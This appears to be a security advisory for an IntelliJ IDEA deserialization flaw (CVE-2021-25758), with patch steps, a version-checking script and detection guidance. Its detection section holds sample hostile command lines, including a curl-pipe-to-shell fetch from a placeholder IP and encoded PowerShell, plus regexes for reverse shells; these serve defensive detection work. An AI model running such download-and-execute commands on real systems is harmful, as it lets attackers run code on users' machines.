CVE-2021-25758

CVSS base score: 7.8 (HIGH)

📋 TL;DR

IntelliJ IDEA before 2020.3 deserializes workspace-model data insecurely. An attacker who can get crafted workspace data loaded by the IDE can execute arbitrary code locally, with the privileges of the user running IntelliJ IDEA. Only installations older than 2020.3 are affected; 2020.3 and later contain the fix.

💻 Affected Systems

Products:
  • JetBrains IntelliJ IDEA
Versions: All versions before 2020.3
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Every installation of an affected version is vulnerable as shipped; no non-default setting is needed for exploitation. The trigger is the IDE loading attacker-controlled workspace data, so the attacker needs a way to place that data where the IDE will read it (a local account on the machine, or project files the user opens).

📦 What is this software?

IntelliJ IDEA is JetBrains' integrated development environment for Java, Kotlin and other JVM languages, shipped as a free Community edition and a commercial Ultimate edition. It runs on developer workstations, typically alongside source repositories, VCS credentials, SSH keys and cloud tokens, which is what makes code execution in the IDE's user context valuable to an attacker.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Arbitrary code running as the developer on the workstation: theft of source code and of the credentials kept in that user's home directory (VCS tokens, SSH keys, cloud CLI sessions), persistence via IDE or shell startup hooks, and lateral movement into the systems those credentials reach. If the developer works from an administrator account, this becomes full control of the machine.

🟠

Likely Case

Arbitrary code execution in the user context of the IDE (this is not a privilege-escalation bug on its own), giving access to the files, repositories and development tooling that user can reach.

🟢

If Mitigated

With least-privilege developer accounts and application allowlisting, the blast radius is reduced to what that one user can do; local exploitation still works until 2020.3 or later is installed. Network segmentation does not stop the exploit itself (it is local) but limits where stolen credentials can be used.

🌐 Internet-Facing: LOW - This is a local vulnerability; nothing about the IDE is reachable over the network, so the attacker needs local access or a way to get crafted workspace data onto the machine.
🏢 Internal Only: HIGH - Other local users, malware already on the host, or a malicious project brought onto a developer workstation could use this to execute arbitrary code as the developer.

🎯 Exploit Status

Public PoC: No
Weaponized: UNKNOWN
Unauthenticated Exploit: No
Complexity: MEDIUM

Exploitation requires local access to the system, or a way to get crafted workspace data loaded by the IDE. Deserialization of attacker-controlled data is a well-understood class of bug with mature tooling, so the absence of a public PoC should not be read as protection.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2020.3 and later

Vendor Advisory: https://blog.jetbrains.com/blog/2021/02/03/jetbrains-security-bulletin-q4-2020/

Restart Required: Yes

Instructions:

1. Open IntelliJ IDEA.
2. Go to Help > Check for Updates (on macOS: IntelliJ IDEA > Check for Updates).
3. Install version 2020.3 or later.
4. Restart IntelliJ IDEA after the installation completes.

🔧 Temporary Workarounds

Restrict workspace file access

Platforms: Linux/macOS (the chmod below; on Windows apply the same intent with NTFS ACLs)

Limit who can write the project's workspace data so that another local account cannot plant crafted content for the IDE to deserialize. From the project root:

chmod 600 .idea/workspace.xml
Read/write for the owner only; no access for group or others.

This narrows only one path to the bug: it stops other local users from tampering with an existing file, but the IDE still deserializes whatever workspace data a project the user opens brings with it. Treat it as a stopgap until 2020.3 or later is installed.

🧯 If You Can't Patch

  • Run the IDE under a least-privilege developer account (never an administrator account) to limit what executed code can reach
  • Implement application allowlisting so binaries dropped by a payload cannot run
  • Until the upgrade is done, open only projects and workspace files from sources you trust

🔍 How to Verify

Check if Vulnerable:

Check the IntelliJ IDEA version in Help > About (on macOS: IntelliJ IDEA > About IntelliJ IDEA). If the version is earlier than 2020.3, the installation is vulnerable.

Check Version:

On Linux/macOS (and Windows, with the equivalent paths), read build.txt or product-info.json from the IDE's installation directory rather than from the config directory (ide.general.xml does not record the product version). /opt/idea below is an assumed install root; on macOS the files sit under "/Applications/IntelliJ IDEA.app/Contents/Resources/":

cat /opt/idea/build.txt
grep '"version"' /opt/idea/product-info.json

build.txt holds a string such as IU-202.7660.26; the three-digit branch maps to the version (202 = 2020.2, 203 = 2020.3), so any branch below 203, or any "version" below 2020.3, is vulnerable.
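The check above, scripted so it can run across a fleet: this is an added example, not JetBrains code. It parses the build.txt branch (203 means 2020.3) or the product-info.json version from a set of assumed installation roots (adjust CANDIDATE_ROOTS to your deployment) and reports whether each install predates the fix.

```python
import json
import re
from pathlib import Path
from typing import Optional, Tuple

# Added example (not JetBrains code). IntelliJ IDEA installs ship a build.txt such as
# "IU-203.5981.155" and a product-info.json with a "version" field such as "2020.3".
# The three-digit branch after the product code maps to the marketing version:
# 203 -> 2020.3, 202 -> 2020.2, 193 -> 2019.3. CVE-2021-25758 is fixed in 2020.3.
FIXED_VERSION = (2020, 3)

# Assumed installation roots; adjust to how the IDE is deployed on your fleet.
CANDIDATE_ROOTS = [
    Path("/opt/idea"),
    Path("/opt/idea-IU"),
    Path("/Applications/IntelliJ IDEA.app/Contents/Resources"),
]

BUILD_RE = re.compile(r"^[A-Z]{2,3}-(\d{3})(?:\.\d+)+$")


def version_from_build(build: str) -> Tuple[int, int]:
    """Turn a build string like 'IC-202.7660.26' into (2020, 2)."""
    m = BUILD_RE.match(build.strip())
    if not m:
        raise ValueError(f"unrecognised IntelliJ build string: {build!r}")
    branch = int(m.group(1))
    return 2000 + branch // 10, branch % 10


def version_from_string(version: str) -> Tuple[int, int]:
    """Turn a product-info.json version like '2020.2.4' into (2020, 2)."""
    parts = version.strip().split(".")
    if len(parts) < 2 or not all(p.isdigit() for p in parts[:2]):
        raise ValueError(f"unrecognised IntelliJ version string: {version!r}")
    return int(parts[0]), int(parts[1])


def is_vulnerable(version: Tuple[int, int]) -> bool:
    """Anything older than 2020.3 is affected by CVE-2021-25758."""
    return version < FIXED_VERSION


def check_install(root) -> Optional[dict]:
    """Inspect one installation root; None if it does not look like an IDE install."""
    root = Path(root)
    build_file = root / "build.txt"
    info_file = root / "product-info.json"
    if build_file.is_file():
        version = version_from_build(build_file.read_text(encoding="utf-8"))
    elif info_file.is_file():
        info = json.loads(info_file.read_text(encoding="utf-8"))
        version = version_from_string(info["version"])
    else:
        return None
    return {"root": str(root), "version": version, "vulnerable": is_vulnerable(version)}


if __name__ == "__main__":
    found = [r for r in (check_install(p) for p in CANDIDATE_ROOTS) if r]
    if not found:
        print("no IntelliJ IDEA installation found under the candidate roots")
    for result in found:
        state = "VULNERABLE (< 2020.3)" if result["vulnerable"] else "patched"
        print(f"{result['root']}: {result['version'][0]}.{result['version'][1]} {state}")
```

Installs managed by JetBrains Toolbox live under a per-user directory rather than /opt, so add those roots (or walk the user's home directories) when running this as an inventory job.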

Verify Fix Applied:

Verify version is 2020.3 or later in Help > About. Test workspace loading functionality remains operational.

📡 Detection & Monitoring

Log Indicators:

  • Child processes of the IDE that it does not normally spawn, or shells/script interpreters launched by it with download-and-execute or encoded command lines (note that IntelliJ legitimately spawns git, java/Gradle, node and the terminal tool window's shell, so baseline first)
  • Deserialization errors or stack traces during project loading in the IDE's idea.log (Help > Show Log in ... locates it)
  • Files under .idea/ or the IDE's system/cache directories modified by a process other than the IDE or the developer's own tooling

Network Indicators:

  • Outbound connections from the IDE process, or from its children, to destinations other than JetBrains update/plugin hosts, your package registries and your VCS servers

SIEM Query:

Illustrative query (field names are generic; map them to your schema). The parent is the IDE: idea64.exe or idea.exe on Windows, the idea launcher inside the .app bundle on macOS, or the bundled java process whose command line contains com.intellij.idea.Main on Linux:

(parent_process_name:("idea64.exe" OR "idea.exe" OR "idea") OR parent_command_line:*com.intellij.idea.Main*) AND process_name:(sh OR bash OR zsh OR cmd.exe OR powershell.exe OR python*) AND command_line:(*curl* OR *wget* OR *-enc* OR *base64* OR */dev/tcp/*)

Without the command-line clause the query fires on every terminal session and build the IDE starts; tune the child and command-line lists against a few days of your own telemetry before alerting on it.
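The logic behind that query, run over constructed sample process-creation events: this is an added example, not from the original page or from JetBrains. The events, the expected-children baseline and the suspicious command-line patterns are all assumptions to be tuned to your environment; the point it shows is that the IDE's parent identity alone is not a signal, since IntelliJ spawns shells and build tools constantly, so the verdict has to come from the child's command line.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (not real telemetry). The field names mirror
# a Sysmon/EDR-style source; map them to your own schema.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent_image": "/opt/idea/jbr/bin/java",
     "parent_cmdline": "/opt/idea/jbr/bin/java -Didea.paths.selector=IntelliJIdea2020.2 com.intellij.idea.Main",
     "image": "/usr/bin/git", "cmdline": "git status --porcelain"},
    {"parent_image": "/opt/idea/jbr/bin/java",
     "parent_cmdline": "/opt/idea/jbr/bin/java -Didea.paths.selector=IntelliJIdea2020.2 com.intellij.idea.Main",
     "image": "/bin/sh", "cmdline": "sh -c 'curl -s http://198.51.100.7/x | sh'"},
    {"parent_image": "C:\\Program Files\\JetBrains\\IntelliJ IDEA 2020.2\\bin\\idea64.exe",
     "parent_cmdline": "\"C:\\Program Files\\JetBrains\\IntelliJ IDEA 2020.2\\bin\\idea64.exe\"",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"parent_image": "C:\\Program Files\\JetBrains\\IntelliJ IDEA 2020.2\\bin\\idea64.exe",
     "parent_cmdline": "\"C:\\Program Files\\JetBrains\\IntelliJ IDEA 2020.2\\bin\\idea64.exe\"",
     "image": "C:\\Program Files\\Java\\jdk-11\\bin\\java.exe",
     "cmdline": "java.exe -classpath gradle\\wrapper\\gradle-wrapper.jar org.gradle.wrapper.GradleWrapperMain build"},
    {"parent_image": "/Applications/IntelliJ IDEA.app/Contents/MacOS/idea",
     "parent_cmdline": "/Applications/IntelliJ IDEA.app/Contents/MacOS/idea",
     "image": "/usr/bin/python3", "cmdline": "python3 /tmp/.cache/u.py"},
    {"parent_image": "/usr/bin/bash", "parent_cmdline": "bash -l",
     "image": "/bin/sh", "cmdline": "sh -c 'curl -s http://198.51.100.7/x | sh'"},
]

# Parent looks like the IDE: the bundled java running com.intellij.idea.Main (Linux),
# idea64.exe/idea.exe (Windows) or the idea launcher inside the .app bundle (macOS).
IDE_PARENT = re.compile(r"com\.intellij\.idea\.Main|(?:^|[\\/])idea(?:64)?(?:\.exe)?$", re.IGNORECASE)

# Children the IDE spawns routinely (assumed baseline; tune from your own telemetry).
# The terminal tool window makes plain shells expected too, so a shell alone is not a signal.
EXPECTED_CHILDREN = {"git", "java", "java.exe", "node", "gradle", "mvn", "fsnotifier",
                     "sh", "bash", "zsh", "cmd.exe", "powershell.exe", "conhost.exe"}

# Download-and-execute pipes, encoded PowerShell, base64 payload decoding, bash /dev/tcp shells.
SUSPICIOUS_CMDLINE = re.compile(
    r"(?:curl|wget)\b[^|]*\|\s*(?:ba|z|da)?sh\b"
    r"|-e(?:nc|ncodedcommand)\s+"
    r"|\bbase64\s+(?:-d|--decode)\b"
    r"|/dev/tcp/",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_ide_parent(event: Dict[str, str]) -> bool:
    return bool(IDE_PARENT.search(event["parent_cmdline"]) or IDE_PARENT.search(event["parent_image"]))


def classify(event: Dict[str, str]) -> str:
    """'ignore' (parent is not the IDE), 'suspicious', 'expected' or 'review'."""
    if not is_ide_parent(event):
        return "ignore"
    if SUSPICIOUS_CMDLINE.search(event["cmdline"]):
        return "suspicious"   # applies even to an expected child such as sh or powershell.exe
    if basename(event["image"]) in EXPECTED_CHILDREN:
        return "expected"
    return "review"           # an unusual child of the IDE: worth a look, not an alert by itself


def find_alerts(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events that need attention, each tagged with its verdict."""
    return [dict(e, verdict=v) for e in events if (v := classify(e)) in ("suspicious", "review")]


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(f"{alert['verdict']:10} {basename(alert['parent_image'])} -> {alert['cmdline']}")
```

The same curl-pipe-to-sh command line under a plain bash parent is classified "ignore" here only because this rule is scoped to the IDE; a general living-off-the-land rule should catch it regardless of parent.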

🔗 References

  • JetBrains Security Bulletin Q4 2020: https://blog.jetbrains.com/blog/2021/02/03/jetbrains-security-bulletin-q4-2020/
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2021-25758
